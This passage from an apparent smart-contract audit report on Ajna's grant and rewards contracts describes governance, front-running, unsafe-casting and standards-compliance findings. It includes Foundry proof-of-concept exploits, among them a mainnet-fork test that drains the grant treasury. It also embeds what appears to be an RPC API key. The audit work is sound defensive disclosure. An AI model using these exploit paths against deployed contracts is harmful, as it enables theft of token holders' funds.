- If 65% of non-treasury tokens vote affirmatively, 10% of the treasury is released
- If 59.9% of non-treasury tokens vote affirmatively, 0% of the treasury is released
The function that checks the conditions above are true, and the proposal has succeeded is _extraordinaryProposalSucceeded
function _extraordinaryProposalSucceeded(
uint256 proposalId_,
uint256 tokensRequested_
) internal view returns (bool) {
uint256 votesReceived = uint256(_extraordinaryFundingProposals[proposalId_].votesReceived);
// @audit-info check _getMinimumThresholdPercentage() function
uint256 minThresholdPercentage = _getMinimumThresholdPercentage();
// succeeded if proposal's votes received doesn't exceed the minimum threshold required
// @audit-info check _getSliceOfNonTreasury() function
(votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage))
// succeeded if tokens requested are available for claiming from the treasury
(tokensRequested_ <= _getSliceOfTreasury(Maths.WAD - minThresholdPercentage))
The vulnerability here lies in the _getSliceOfNonTreasury()
function _getSliceOfNonTreasury(
uint256 percentage_
) internal view returns (uint256) {
uint256 totalAjnaSupply = IERC20(ajnaTokenAddress).totalSupply();
// return ((ajnaTotalSupply - treasury) * percentage + 10**18 / 2) / 10**18;
return Maths.wmul(totalAjnaSupply - treasury, percentage_);
The reason is that it relies on the current total supply and AjnaToken inherits ERC20Burnable, a malicious user can burn his tokens to lower the minimum threshold needed for votes and make the proposal pass.
Bob, a token holder, owns 10% of the Ajna supply. He creates a proposal where he requests 20% of the treasury. For his proposal to pass, Bob needs to gather 70% of the votes (50% as the threshold because there are no other funded proposals yet and an additional 20% for the tokens he requested). Unfortunately, Bob only manages to acquire 61% of the total votes.
function _getMinimumThresholdPercentage() internal view returns (uint256) {
// default minimum threshold is 50
if (_fundedExtraordinaryProposals.length == 0) {
return 0.5 * 1e18;
// minimum threshold increases according to the number of funded EFM proposals
else {
// @audit-info 10 proposals max
return 0.5 * 1e18 + (_fundedExtraordinaryProposals.length * (0.05 * 1e18));
// 70% 20%
(votesReceived >= tokensRequested_
+ _getSliceOfNonTreasury(minThresholdPercentage))
// succeeded if tokens requested are available for claiming from the treasury
(tokensRequested_ <= _getSliceOfTreasury(Maths.WAD - minThresholdPercentage))
Bob then burns 10% of his own tokens. This action reduces the total supply and, consequently, the threshold too. Now, the proposal needs only 61% to pass, and since Bob already has this percentage, he can execute his proposal and siphon off funds from the treasury.
Here’s a PoC that can be used to showcase the issue:
For the ease of use, please add a console.log to the _extraordinaryProposalSucceeded
function _extraordinaryProposalSucceeded(
uint256 proposalId_,
uint256 tokensRequested_
) internal view returns (bool) {
uint256 votesReceived = uint256(_extraordinaryFundingProposals[proposalId_].votesReceived);
uint256 minThresholdPercentage = _getMinimumThresholdPercentage();
+ console.log("tokensNeeded", tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage));
// 50k 30k // 50k
(votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage))
// succeeded if tokens requested are available for claiming from the treasury
(tokensRequested_ <= _getSliceOfTreasury(Maths.WAD - minThresholdPercentage))
function testManipulateSupply() external {
// 14 tokenholders self delegate their tokens to enable voting on the proposals
_selfDelegateVoters(_token, _votersArr);
vm.roll(_startBlock + 100);
// set proposal params
uint256 endBlockParam = block.number + 100_000;
// generate proposal targets
address[] memory targets = new address[](1);
targets[0] = address(_token);
// generate proposal values
uint256[] memory values = new uint256[](1);
values[0] = 0;
// generate proposal calldata
bytes[] memory calldatas = new bytes[](1);
calldatas[0] = abi.encodeWithSignature(
50_000_001 * 1e18
// create and submit proposal
TestProposalExtraordinary memory testProposal = _createProposalExtraordinary(
"Extraordinary Proposal for Ajna token transfer to tester address"
vm.roll(_startBlock + 150);
uint256 votingWeight = _grantFund.getVotesExtraordinary(_tokenHolder2, testProposal.proposalId);
uint256 totalSupply = _token.totalSupply();
address bob = makeAddr("bob");
_token.transfer(bob, _token.balanceOf(_tokenDeployer));
vm.roll(_startBlock + 217_000);
Running the test with Bob burning tokens
uint256 totalSupply = _token.totalSupply();
address bob = makeAddr("bob");
_token.transfer(bob, _token.balanceOf(_tokenDeployer));
Yields the following result:
Whereas if we remove the burning, the tokens needed are increased
- uint256 totalSupply = _token.totalSupply();
- address bob = makeAddr("bob");
- changePrank(_tokenDeployer);
- _token.transfer(bob, _token.balanceOf(_tokenDeployer));
- changePrank(bob);
- _token.burn(_token.balanceOf(bob));
Recommended Mitigation Steps
To mitigate this vulnerability, consider implementing a mechanism that uses a snapshot of the total supply at the time of proposal submission rather than the current total supply. This change will prevent the threshold from being manipulated by burning tokens.
MikeHathaway (Ajna) acknowledged
Picodes (judge) decreased severity to Medium and commented:
Considering that:
- it is within the design of the grant system that the threshold is computed at the end of the voting period to account for potential parallel proposals and changes in the external supply
- however, this finding shows how large holders could significantly increase their voting power to pass an extraordinary proposal and to a significant extent manipulate the vote
I think this report and its duplicate qualify for Medium severity under “hypothetical attack path with stated assumptions, but external requirements”
[M-09] Adversary can prevent the creation of any extraordinary funding proposal by frontrunning proposeExtraordinary()
Submitted by juancito, also found by Haipls
A griefing attack can be conducted to prevent the creation of any extraordinary funding proposal, or targetting specific receivers.
The cost of performing the attack is low, only involving the gas payment for the transaction.
Proof of Concept
hashes all its inputs except for endBlock_
when creating the proposalId
function proposeExtraordinary(
uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_) external override returns (uint256 proposalId_) {
proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
This allows an adversary to frontrun the transaction, and create an exact proposal, but with an endBlock
that will the proposal expire instantly, in a past block or whenever they want.
ExtraordinaryFundingProposal storage newProposal = _extraordinaryFundingProposals[proposalId_];
// ...
newProposal.endBlock = SafeCast.toUint128(endBlock_);
Nobody will be able to vote via ExtraordinaryFunding::voteExtraordinary
, as the transaction will revert because of proposal.endBlock < block.number
if (proposal.startBlock > block.number || proposal.endBlock < block.number || proposal.executed) {
revert ExtraordinaryFundingProposalInactive();
With no votes, the proposal can’t be executed.
Coded Proof of Concept
This test demonstrates how an adversary can frontrun the creation of an extraordinary proposal with a value of endBlock
that will the proposal “end” instantly, while preventing the intended proposal to be created.
Add this test to ajna-grants/test/unit/ExtraordinaryFunding.t.sol
and run forge test -m "testProposeExtraordinary_Frontrun"
function testProposeExtraordinary_Frontrun() external {
// The user that will try to propose the funding
// 14 tokenholders self delegate their tokens to enable voting on the proposals
_selfDelegateVoters(_token, _votersArr);
vm.roll(_startBlock + 100);
// set proposal params
uint256 endBlockParam = block.number + 100_000;
uint256 tokensRequestedParam = 50_000_000 * 1e18;
// generate proposal targets
address[] memory targets = new address[](1);
targets[0] = address(_token);
// generate proposal values
uint256[] memory values = new uint256[](1);
values[0] = 0;
// generate proposal calldata
bytes[] memory calldatas = new bytes[](1);
calldatas[0] = abi.encodeWithSignature(
// An attacker sees the proposal in the mempool and frontruns it.
// By setting an `endBlock_ == 0`, it will create a "defeated" proposal.
// So when the actual user tries to send the real proposal, that one will revert.
address attacker = makeAddr("attacker");
uint256 pastEndBlockParam = 0; // @audit
uint256 proposalId = _grantFund.proposeExtraordinary(
pastEndBlockParam, targets, values, calldatas, "Extraordinary Proposal for Ajna token transfer to tester address"
// Verify that the proposal is created and has a `Defeated` state
IFunding.ProposalState proposalState = _grantFund.state(proposalId);
assertEq(uint8(proposalState), uint8(IFunding.ProposalState.Defeated));
// When the user tries to send the proposal it will always revert.
// As a previous proposal with the same hash has been already sent, despite that having a malicious `endBlockParam`.
endBlockParam, targets, values, calldatas, "Extraordinary Proposal for Ajna token transfer to tester address"
Recommended Mitigation Steps
Add endBlock_
to the hash of the proposal. This way there will be no impact in frontrunning the transaction, as the expected proposal will be stored.
function proposeExtraordinary(
uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_) external override returns (uint256 proposalId_) {
- proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
+ proposalId_ = _hashProposal(endBlock_, targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
function executeExtraordinary(
+ uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
bytes32 descriptionHash_
) external nonReentrant override returns (uint256 proposalId_) {
- proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, descriptionHash_)));
+ proposalId_ = _hashProposal(endBlock_, targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, descriptionHash_)));
[M-10] Unsafe casting from uint256
to uint128
in RewardsManager
Submitted by Haipls
Unsafe casting from uint256
to uint128
in RewardsManager, instances:
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
178: BucketState storage toBucket = stakeInfo.snapshot[toIndex];
+179: toBucket.lpsAtStakeTime = uint128(positionManager.getLP(tokenId_, toIndex));
+180: toBucket.rateAtStakeTime = uint128(IPool(ajnaPool).bucketExchangeRate(toIndex));
235: // record the number of lps in bucket at the time of staking
+236: bucketState.lpsAtStakeTime = uint128(positionManager.getLP(
237: tokenId_,
238: bucketId
239: ));
240: // record the bucket exchange rate at the time of staking
+241: bucketState.rateAtStakeTime = uint128(IPool(ajnaPool).bucketExchangeRate(bucketId));
can cause an overflow which, in turn, can lead to unforeseen consequences such as:
- The inability to calculate new rewards, as
nextExchangeRate > exchangeRate_
will always be true after the overflow. - Reduced rewards because
will be reduced. - Reduced rewards because
will be reduced. - In case
overflows first but does not go beyond the limits in the new epoch, it will result in increased rewards being accrued.
Proof of Concept
In RewardsManager.stake()
and RewardsManager.moveStakedLiquidity()
, the functions downcast uint256
to uint128
without checking whether it is bigger than uint128
or not.
In stake()
& moveStakedLiquidity()
when getLP >= type(uint128).max
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
236: bucketState.lpsAtStakeTime = uint128(positionManager.getLP(
237: tokenId_,
238: bucketId
239: ));
Let’s assume, that the staker had LP in the bucket equal type(uint128).max
, and his stake balance LP was recorded as 0. As a result, the reward for the epoch at the moment of the stake will be accrued as
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
504: interestEarned_ = Maths.wmul(nextExchangeRate - exchangeRate_, bucketLP_);
11: uint256 internal constant WAD = 1e18;
13: function wmul(uint256 x, uint256 y) internal pure returns (uint256) {
14: return (x * y + WAD / 2) / WAD;
15: }
And will be equal to (0 + 0.5e18)/1e18=0, resulting in the user losing the reward.
In stake() & moveStakedLiquidity()
when bucketExchangeRate >= type(uint128).max
If an overflow occurs and bucketExchangeRate
is reset to zero:
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
180: toBucket.rateAtStakeTime = uint128(IPool(ajnaPool).bucketExchangeRate(toIndex));
241: bucketState.rateAtStakeTime = uint128(IPool(ajnaPool).bucketExchangeRate(bucketId));
Results in the reward being skipped for one 1 epoch, because:
File: ajna-core\src\RewardsManager.sol
497: uint256 nextExchangeRate = bucketExchangeRates[pool_][bucketIndex_][nextEventEpoch_];
499: // calculate interest earned only if next exchange rate is higher than current exchange rate
500: if (nextExchangeRate > exchangeRate_) {
502: // calculate the equivalent amount of quote tokens given the stakes lp balance,
503: // and the exchange rate at the next and current burn events
504: interestEarned_ = Maths.wmul(nextExchangeRate - exchangeRate_, bucketLP_);
505: }
The current rate will be equal to 0 or greater than 0, but less than the previous rate.
Also, if the next epoch has a rate less than type(uint128).max
, this will result in interestEarned_ = Maths.wmul(nextExchangeRate - exchangeRate_, bucketLP_);
, where nextExchangeRate - exchangeRate_
will be in the range of 2^128 - 1 - {0, N^18}
. This can lead to an overflow error when bucketLP_
is large (1e45)
, because (2^128-1) * 1e38
, which in turn can cause the transaction to fail.
File: ajna-core\src\libraries\internal\Maths.sol
13: function wmul(uint256 x, uint256 y) internal pure returns (uint256) {
14: return (x * y + WAD / 2) / WAD;
15: }
Yes, in the case of LP, the number of tokens approaching 2^128
is highly unlikely and does not pose a direct threat to the user, except for not receiving the reward. But as for the bucketExchangeRate, since it is calculated according to different formulas, it cannot be ruled out that such a case is more likely
Tests for LP, which simply shows that overflow occurs:
diff --git a/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol b/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
index 4100e9f..58c3d8c 100644
--- a/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
+++ b/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
@@ -8,7 +8,7 @@ import 'src/interfaces/rewards/IRewardsManager.sol';
import { ERC20Pool } from 'src/ERC20Pool.sol';
import { RewardsHelperContract } from './RewardsDSTestPlus.sol';
+import '@std/console2.sol';
contract RewardsManagerTest is RewardsHelperContract {
address internal _borrower;
@@ -127,6 +127,33 @@ contract RewardsManagerTest is RewardsHelperContract {
+ function test_Issue() external {
+ // configure NFT position one
+ uint256[] memory depositIndexes = new uint256[](1);
+ depositIndexes[0] = 9;
+ uint256 mintAmount = uint256(type(uint128).max) + 1;
+ uint256 tokenIdOne = _mintAndMemorializePositionNFT({
+ indexes: depositIndexes,
+ minter: _minterOne,
+ mintAmount: mintAmount,
+ pool: address(_pool)
+ });
+ uint256 lpBalance;
+ (lpBalance, ) =_pool.lenderInfo(depositIndexes[0], address(_positionManager));
+ console2.log("_pool.lenderInfo for _positionManager before stake", lpBalance);
+ // minterOne deposits their NFT into the rewards contract
+ _stakeToken({
+ pool: address(_pool),
+ owner: _minterOne,
+ tokenId: tokenIdOne
+ });
+ uint256 lpsAtStakeTime;
+ uint256 rateAtStakeTime;
+ (lpsAtStakeTime, rateAtStakeTime) = _rewardsManager.getBucketStateStakeInfo(tokenIdOne, depositIndexes[0]);
+ console2.log("getBucketStateStakeInfo.lpsAtStakeTime after stake", lpsAtStakeTime);
+ }
Tools Used
- Manual review
- Foundry
Recommended Mitigation Steps
- use OpenZeppelin’s SafeCast library when casting from uint256 to uint128.
- don’t make casting from uint256 to uint128
Valid for the case of
[M-11] StandardFunding.fundingVote
should not allow users who didn’t vote in screening stage to vote
Submitted by nobody2018
Users who did not vote in the screening stage but voted in the funding stage are not allowed to claim rewards via claimDelegateReward
. Voting in the funding stage will occupy the distribution ratio of rewards. Since these rewards cannot be claimed, in the long run, the ajnaToken balance of the GrantFund contract is inconsistent with treasury
Proof of Concept
At the beginning of the StandardFunding.claimDelegateReward
function, check whether the caller voted in the screening stage.
function claimDelegateReward(
uint24 distributionId_
) external override returns(uint256 rewardClaimed_) {
// Revert if delegatee didn't vote in screening stage
-> if(screeningVotesCast[distributionId_][msg.sender] == 0) revert DelegateRewardInvalid();
QuarterlyDistribution memory currentDistribution = _distributions[distributionId_];
is used to vote in the funding stage. This function does not check whether the caller voted in the screening stage. fundingVote
subcalls _fundingVote, which affects the allocation of rewards. _getDelegateReward
is used by claimDelegateReward
to calculate the reward distributed to the caller.
function _getDelegateReward(
QuarterlyDistribution memory currentDistribution_,
QuadraticVoter memory voter_
) internal pure returns (uint256 rewards_) {
// calculate the total voting power available to the voter that was allocated in the funding stage
uint256 votingPowerAllocatedByDelegatee = voter_.votingPower - voter_.remainingVotingPower;
// if none of the voter's voting power was allocated, they receive no rewards
if (votingPowerAllocatedByDelegatee == 0) return 0;
// calculate reward
// delegateeReward = 10 % of GBC distributed as per delegatee Voting power allocated
-> rewards_ = Maths.wdiv(
currentDistribution_.fundsAvailable, //total funds in current distribution
votingPowerAllocatedByDelegatee //voter's vote power
currentDistribution_.fundingVotePowerCast //total vote power in current distribution
) / 10; // 10% fundsAvailable
As long as fundingVote
is successfully called, it means that the reward is locked to the caller. However, the caller cannot claim these rewards. There is no code to calculate the amount of these rewards that can never be claimed.
Recommended Mitigation Steps
Two ways to fix this problem:
does not allow users who didn’t vote in screening stage.- Delete the code on line L240.
[M-12] Governance attack on Extraordinary Proposals
Submitted by 0xRobocop, also found by sces60107, ktg, rvierdiiev, and Dug
The mechanics for Extraordinary proposals are simple and robust for attacks. There is a variable that is called Minimum Threshold (MT). The maximum amount of treasury tokens that can be requested on a proposal is bounded by MT. Basically, you can request any amount of tokens up to a maximum percentage of (1 - MT).
For a proposal to succeed, it needs a percentage of non-treasury tokens equal or greater than:
MT + percentage of treasury tokens requested
Quoting the whitepaper:
a. A proposer requests tokens equivalent to 10% of the treasury
i. 50% + 10% = 60%
ii. If 65% of non-treasury tokens vote affirmatively, 10% of the treasury is released
iii. If 59.9% of non-treasury tokens vote affirmatively, 0% of the treasury is released
For example, if you want to request the max percentage of treasury tokens, that is 1 - MT
, the proposal will need (1 - MT) + MT
percentage of non-treasury tokens, it means 100%. Note that I am not giving a specific value for MT
, so this should hold for any extraordinary proposal, even when the value of MT
changes. The design is correct, but the implementation is not. The implementation of the constraint of votes needed for a proposal is implemented as follows:
votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage)
To see where is the mistake, we must convert the above formula into percentages, so we can compared it with what is written in the whitepaper. We know that votesReceived
is some percentage (P1) of Non-treasury tokens, tokensRequested
is some percentage (P2) of treasury tokens and _getSliceOfNonTreasury(minThresholdPercentage)
is some percentage (P3) of Non-treasury tokens.
We also know that P2 is bounded by the minimum threshold, because we want to test the case where the maximum is requested then P2 becomes (1 - MT)
and we know that P3 is MT
. Re-writing:
(P1)(NonTreasuryT) = (1 - MT)(TreasuryT) + (MT)(NonTreasuryT)
I changed >=
for =
because I am interested on the minimum votes needed. Divide by NonTreasuryT
, rewrite:
P1 = ((1 - MT)(TreasuryT) / (NonTreasuryT)) + MT
Now we have the formula re-written in terms of percentages, where we can see that 1 - MT
which is the percentage of requested treasury tokens is multiplied by the division of TreasuryT / NonTreasuryT
. This has the consequence of reducing 1 - MT
since NonTreasuryT
will be greater than TreasuryT
. For example, let’s take the case where the 1st proposal request the maximum amount of treasury tokens, that is, 50%.
P1 = ((50%)(TreasuryT) / (NonTreasuryT)) + 50%
Is clearly to see that P1 will be smaller than 100% (in the case where TreasuryT < NonTreasuryT), violating the design described on the whitepaper.
The proof of concept presented below is a scenario based on a total supply of 1B tokens, and a treasury of 300M tokens. In this scenario:
P1 = ((50%)(300M) / (700M)) + 50% == 71.4%
If we want to request again the maximum treasury tokens on the second proposal we will need:
P1 = ((45%)(150M) / (850M)) + 55% == 62.94%
We see a reduction on the percentage of non-treasury tokens needed between proposals, which should not happen, remember than on the design described on the whitepaper a proposal always need 100% of non treasury tokens when requesting the max amount of treasury tokens, no mattering the value of MT
The PoC shows a possible scenario where an attacker can take advantage of this mistake that will allow him to drain the treasury if he manages to execute the first proposal.
The PoC is based on the assumption that the attacker manages to get a big portion (385M out of 700 non treasury tokens) of ajna tokens and convince other holders (115M of tokens) to vote (or delegate to him) for his proposal requesting the 50% of the treasury. If the attacker manages to achieve this, then he can drain the treasury alone, using the next proposals (because of the reduction of the percentage needed), even without the help of the previous holders.
Proof of Concept
- Create a file under
and call itExploitEF.t.sol
Copy and paste the following:
// SPDX-License-Identifier: MIT pragma solidity 0.8.16;
import { GrantFund } from ”../../src/grants/GrantFund.sol”; import { IExtraordinaryFunding } from ”../../src/grants/interfaces/IExtraordinaryFunding.sol”; import { IFunding } from ”../../src/grants/interfaces/IFunding.sol”; import { GrantFundTestHelper } from “../utils/GrantFundTestHelper.sol”; import { IAjnaToken } from “../utils/IAjnaToken.sol”; import { DrainGrantFund } from “../interactions/DrainGrantFund.sol”;
contract ExploitEF is GrantFundTestHelper {
IAjnaToken internal _token; GrantFund internal _grantFund; // Ajna token Holder at the Ajna contract creation on mainnet address internal _tokenDeployer = 0x666cf594fB18622e1ddB91468309a7E194ccb799; address internal _attacker = makeAddr("_tokenHolder1"); address internal _tokenHolder2 = makeAddr("_tokenHolder2"); address internal _tokenHolder3 = makeAddr("_tokenHolder3"); address internal _tokenHolder4 = makeAddr("_tokenHolder4"); address internal _tokenHolder5 = makeAddr("_tokenHolder5"); address internal _tokenHolder6 = makeAddr("_tokenHolder6"); address[] internal _votersArrAttacker = [ _attacker ]; address[] internal _votersArr = [ _tokenHolder2, _tokenHolder3, _tokenHolder4, _tokenHolder5, _tokenHolder6 ]; address[] internal _helperAttackerDelegatee = [ _attacker, _attacker, _attacker, _attacker, _attacker ]; // at this block on mainnet, all ajna tokens belongs to _tokenDeployer uint256 internal _startBlock = 16354861; // at this block on mainnet, 1B ajna tokens where burned, reducing the supply to 1B. uint256 internal _startBlock2 = 16478160; function setUp() external { vm.createSelectFork("https://eth-mainnet.g.alchemy.com/v2/V2bjD46crGUhn4EDk92txmvC0BFqLzjo", _startBlock2); vm.startPrank(_tokenDeployer); // Ajna Token contract address on mainnet _token = IAjnaToken(0x9a96ec9B57Fb64FbC60B423d1f4da7691Bd35079); // deploy growth fund contract _grantFund = new GrantFund(); // initial minter distributes tokens to test addresses _transferAjnaTokens(_token, _votersArrAttacker, 385_000_000 * 1e18, _tokenDeployer); _transferAjnaTokens(_token, _votersArr, 23_000_000 * 1e18, _tokenDeployer); // initial minter distributes treasury to grantFund // A treasury with 300M ajna tokens (Using whitepaper values) changePrank(_tokenDeployer); _token.approve(address(_grantFund), 300_000_000 * 1e18); _grantFund.fundTreasury(300_000_000 * 1e18); } function test_drainTreasury() external { /* STATUS: - Attacker has 385M of ajna tokens - Holders from 2 to 6 have 23M of ajna tokens each, total of = 115M - TotalSupply is 1B ajna tokens. - Treasury is 300M ajna tokens - Non-Treasury tokens are 700M tokens */ assertEq(_token.balanceOf(_attacker), 385_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder2), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder3), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder4), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder5), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder6), 23_000_000 * 1e18); assertEq(_token.totalSupply(), 1_000_000_000 * 1e18); assertEq(_grantFund.treasury(), 300_000_000 * 1e18); assertEq(_grantFund.getSliceOfNonTreasury(1e18), 700_000_000 * 1e18); // Attacker self delegates _delegateTo(_token, _votersArrAttacker, _votersArrAttacker); // All holders delegate their tokens to the attacker. _delegateTo(_token, _votersArr, _helperAttackerDelegatee); vm.roll(_startBlock2 + 100); // set proposal params uint256 endBlockParam = block.number + 100_000; // 150M tokens requested, that is 50% of treasury uint256 tokensRequestedParam = 150_000_000 * 1e18; // generate proposal targets address[] memory targets = new address[](1); targets[0] = address(_token); // generate proposal values uint256[] memory values = new uint256[](1); values[0] = 0; // generate proposal calldata bytes[] memory calldatas = new bytes[](1); calldatas[0] = abi.encodeWithSignature( "transfer(address,uint256)", _attacker, tokensRequestedParam ); // create and submit proposal TestProposalExtraordinary memory testProposal = _createProposalExtraordinary( _grantFund, _attacker, endBlockParam, targets, values, calldatas, "We are requesting 50% of the treasury since this is a super important and big development for the ecosystem" ); // Attacker has 500M of voting power which is ~ 71.4% of Non-Treasury Tokens uint256 attackerVotingPowerForEP = _grantFund.getVotesExtraordinary(_attacker, testProposal.proposalId); assertEq(attackerVotingPowerForEP, 500_000_000 * 1e18); changePrank(_attacker); _grantFund.voteExtraordinary(testProposal.proposalId); // Proposal state is Succeeded with only a 500M voting power. // Attacker was able to request 50% of treasury with only 71.4% of the Non-treasury tokens. // Whitepaper says that in order to request 50% of tokens (1st proposal, so Minium Threshold equals 50%), // the proposal will need 50% + 50% = 100% of Non-Treasury tokens. Which here is demostrated that you only need 71.4%. IFunding.ProposalState proposalState = _grantFund.state(testProposal.proposalId); assertEq(uint8(proposalState), uint8(IFunding.ProposalState.Succeeded)); // execute proposal _grantFund.executeExtraordinary(targets, values, calldatas, keccak256(bytes(testProposal.description))); /* Status after the 1st proposal success: - Attacker has 535M of ajna tokens - Holders from 2 to 6 have 23M of ajna tokens each, total of = 125M - TotalSupply is 1B ajna tokens. - Treasury is 150M ajna tokens - Non-Treasury tokens are 850M tokens */ assertEq(_token.balanceOf(_attacker), 535_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder2), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder3), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder4), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder5), 23_000_000 * 1e18); assertEq(_token.balanceOf(_tokenHolder6), 23_000_000 * 1e18); assertEq(_token.totalSupply(), 1_000_000_000 * 1e18); assertEq(_grantFund.treasury(), 150_000_000 * 1e18); assertEq(_grantFund.getSliceOfNonTreasury(1e18), 850_000_000 * 1e18); /* After the 1st proposal has succeed, the attacker now can drain the treasury alone, without the previous delegators. This happens because the formula actually makes it easier to execute further extraordinary proposals. For example the previous proposal required 71.4% of non-treasury tokens to pass a proposal of 50% of treasury tokens. I will show how the second proposal will only require 62.94% of non-treasury tokens to pass a proposal of 45% of treasury tokens. Which is a slightly increase from 500M needed to 535M needed, that is only a 7% difficulty increase. Whereas the attacker increased his voting power from 385M to 535M (thanks to proposal 1) which is a 39% increase in his voting power. */ // Holders now delegates for them _delegateTo(_token, _votersArrAttacker, _votersArrAttacker); _delegateTo(_token, _votersArr, _votersArr); vm.roll(_startBlock2 + 500); // set proposal params uint256 endBlockParam2 = block.number + 100_000; // 67.5 tokens requested, that is 45% of treasury uint256 tokensRequestedParam2 = 67_500_000 * 1e18; // generate proposal targets address[] memory targets2 = new address[](1); targets2[0] = address(_token); // generate proposal values uint256[] memory values2 = new uint256[](1); values2[0] = 0; // generate proposal calldata bytes[] memory calldatas2 = new bytes[](1); calldatas2[0] = abi.encodeWithSignature( "transfer(address,uint256)", _attacker, tokensRequestedParam2 ); // create and submit proposal TestProposalExtraordinary memory testProposal2 = _createProposalExtraordinary( _grantFund, _attacker, endBlockParam2, targets2, values2, calldatas2, "Thanks for proposal 1, now I will drain the treasury" ); // Attacker has 535M of voting power which is ~ 62.94% of Non-Treasury Tokens uint256 attackerVotingPowerForEP2 = _grantFund.getVotesExtraordinary(_attacker, testProposal2.proposalId); assertEq(attackerVotingPowerForEP2, 535_000_000 * 1e18); changePrank(_attacker); _grantFund.voteExtraordinary(testProposal2.proposalId); // Attacher succeed IFunding.ProposalState proposalState2 = _grantFund.state(testProposal2.proposalId); assertEq(uint8(proposalState2), uint8(IFunding.ProposalState.Succeeded)); // execute proposal _grantFund.executeExtraordinary(targets2, values2, calldatas2, keccak256(bytes(testProposal2.description))); // Attacker balance is now 602.5M assertEq(_token.balanceOf(_attacker), 602_500_000 * 1e18); // The attacker can continue requesting (1- MiniumThreshold)% of the treasury until threshold becomes 100%. } function _delegateToDelegatees(IAjnaToken token_, address delegator_, address delegatee_) internal { changePrank(delegator_); token_.delegate(delegatee_); } function _delegateTo(IAjnaToken token_, address[] memory delegators_, address[] memory delegatees_) internal { for (uint256 i = 0; i < delegators_.length; ++i) { _delegateToDelegatees(token_, delegators_[i], delegatees_[i]); } }
- Run
forge test --match-contract ExploitEF --match-test test_drainTreasury
Recommended Mitigation Steps
Re-write the constraint as follows:
votesReceived >= _getSliceOfNonTreasury(percentageOfTreasuryTokensRequested) + _getSliceOfNonTreasury(minThresholdPercentage)
Picodes (judge) decreased severity to Medium
ith-harvey (Ajna) confirmed and commented:
We removed the EFM.
[M-13] PositionManager
& PermitERC721
Failure to comply with the EIP-4494
Submitted by Haipls
The contract PositionManager.sol
inherits from PermitERC721.sol
, but both contracts incorrectly implement the EIP-4494
standard, which is an important part of the contract. This leads to the following issues:
are notEIP-4494
compliant- Automatic tools will not be able to determine that this contract has a
- Third-party contracts will not be able to determine that this is
- Inability to correctly track which
are currently relevant, leading to the creation of invalid signatures/signatures for the future - No support for compact signatures
Proof of Concept
According to the specifications of the standard EIP-4494, the following violations were found:
requires the implementation ofIERC165
and the indication of support for the interface0x5604e225
, which is not implementedEIP-4494
requires the presence of the functionfunction nonces(uint256 tokenId) external view returns(uint256);
which is missingEIP-4494
requires the functionfunction permit(address spender, uint256 tokenId, uint256 deadline, bytes memory sig) external;
, which is incorrectly declared as
File: 2023-05-ajna\ajna-core\src\base\PermitERC721.sol
77: function permit(
78: address spender_, uint256 tokenId_, uint256 deadline_, uint8 v_, bytes32 r_, bytes32 s_
79: ) external {
Tools Used
- Manual review
- Foundry
- https://eips.ethereum.org/EIPS/eip-4494
Recommended Mitigation Steps
- Correct the identified non-compliance issues so that the contracts meet the standard
- Or remove references to the standard and provide a reference to the Uniswap V3 implementation
Picodes (judge) decreased severity to Low and commented:
Downgrading to Low as part of this is out of scope here, and the rest can be considered an instance of “function incorrect as to spec”
Hi @Picodes - The
is indeed out of scope, which subsequently makes points1
out of scope as well. However, I’d like you to take another look at point2
.EIP-4494 necessitates the inclusion of the function:
function nonces(uint256 tokenId) external view returns(uint256);
which is currently absent.We can see that
is an abstract contract which only partially implements EIP-4494, and it does so incorrectly, thereby making this part out of scope. However, it also imposes a requirement (abstract contract with abstract_getAndIncrementNonce()
method) onPositionManager
to implementnonces
method on its end, which is within scope. This conclusion can be drawn from the following method:File: ajna-core/src/base/PermitERC721.sol 29: /** @dev Gets the current nonce for a token ID and then increments it, returning the original value */ 30: function _getAndIncrementNonce(uint256 tokenId_) internal virtual returns (uint256);
This suggests that the
method must be implemented inPositionManager
, PermitERC721 transfers this responsibility to descendants. And according to point 2,PositionManager
is the final contract that violates theEIP-4494
standard, which is indeed within scope. According to EIP-4494 documentation, thenonces
declaration is stated under Three new functions MUST be added to ERC-721:, which, in my opinion, can’t be simply dismissed asfunction incorrect as to spec
. According to the practice I’ve observed, any violation of the standard withMUST label
is usually rated asMedium
- https://github.com/code-423n4/2023-02-ethos-findings/issues/638
- https://github.com/code-423n4/2023-04-caviar-findings/issues/44
